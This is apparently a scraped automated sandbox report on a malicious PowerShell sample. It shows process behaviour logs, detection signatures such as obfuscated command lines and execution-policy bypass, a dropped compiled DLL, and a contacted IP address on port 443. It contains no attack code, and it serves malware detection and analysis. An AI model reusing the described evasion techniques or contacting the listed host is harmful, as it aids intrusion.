Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1542797 Sample: x6bjOrKFQn.ps1 Startdate: 26/10/2024 Architecture: WINDOWS Score: 100 27 Malicious sample detected (through community Yara rule) 2->27 29 Antivirus detection for dropped file 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 7 other signatures 2->33 7 powershell.exe 26 2->7         started        process3 file4 21 C:\Users\user\AppData\...\jntjspe1.cmdline, Unicode 7->21 dropped 35 Suspicious powershell command line found 7->35 37 Obfuscated command line found 7->37 39 Bypasses PowerShell execution policy 7->39 41 Found suspicious powershell code related to unpacking or dynamic code loading 7->41 11 csc.exe 3 7->11         started        14 powershell.exe 20 7->14         started        17 conhost.exe 7->17         started        signatures5 process6 dnsIp7 23 C:\Users\user\AppData\Local\...\jntjspe1.dll, PE32 11->23 dropped 19 cvtres.exe 1 11->19         started        25 206.41.208.89, 443, 49730 AS17054US United States 14->25 file8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
206.41.208.89
 unknown United States
17054 AS17054US false